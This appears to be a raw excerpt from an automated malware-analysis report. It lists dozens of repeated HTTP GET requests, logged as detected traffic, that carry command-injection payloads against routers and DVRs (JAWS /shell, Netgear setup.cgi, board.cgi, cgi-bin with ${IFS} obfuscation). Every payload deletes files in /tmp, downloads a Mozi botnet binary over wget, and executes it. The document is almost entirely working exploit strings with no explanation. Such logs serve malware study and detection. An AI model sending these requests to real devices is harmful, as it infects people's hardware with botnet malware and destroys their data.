                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 119.201.115.104:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 108.121.86.213:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 193.59.63.137:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 159.88.243.196:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 135.175.75.166:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 102.14.30.69:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 188.234.2.182:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 74.23.91.76:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 126.211.100.65:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 8.175.157.126:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 156.26.16.136:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 198.217.213.38:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 22.97.50.105:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 220.208.144.34:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 140.43.141.189:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 157.246.210.71:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 39.5.42.35:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 159.209.117.216:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 170.86.222.194:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 143.80.92.37:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 29.239.31.161:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
